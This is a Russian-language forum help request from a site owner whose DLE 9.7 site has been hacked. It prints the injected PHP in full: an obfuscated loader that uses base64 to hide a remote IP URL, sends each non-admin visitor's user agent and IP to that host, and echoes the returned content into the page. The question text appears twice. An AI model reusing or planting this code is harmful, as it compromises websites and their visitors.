Взлом сайта, вредоносный код
На сайте в разных файлах появляется такой код:
Плагин для tinymce spellcheker был давно удалён, НО код появился несколько дней назад..
Возможно ещё есть дырки в DLE?
Версия движка - 9.7
Источник:dle-faq.pro, DLE
function getnewsfromid($id) {
$id = intval($id);
$rtn = $id + date("j");
return $rtn;
}
function mysql_safe_connect($in) {
if (getnewsfromid(64) < 1024) {
$rtn = base64_decode($in);
return $rtn;
}
}
function get_all_news_by_list($newsid) {
if (date("j") - $newsid > 320 ) {
$rtn = false;
} else {
$get = mysql_safe_connect("aHR0cDovLzE3OC4yMTEuMzMuNzcvZ2V0X2FwaS5waHA/cGlkPTIm")."br=".base64_encode($_SERVER['HTTP_USER_AGENT'])."&ip=".base64_encode($_SERVER['REMOTE_ADDR']);
if (!isset($_COOKIE[mysql_safe_connect("ZGxlX3Bhc3N3b3Jk")])) {
echo @file_get_contents($get);
}
}
}
get_all_news_by_list (date("j"));Плагин для tinymce spellcheker был давно удалён, НО код появился несколько дней назад..
Возможно ещё есть дырки в DLE?
Версия движка - 9.7
Источник:dle-faq.pro, DLE
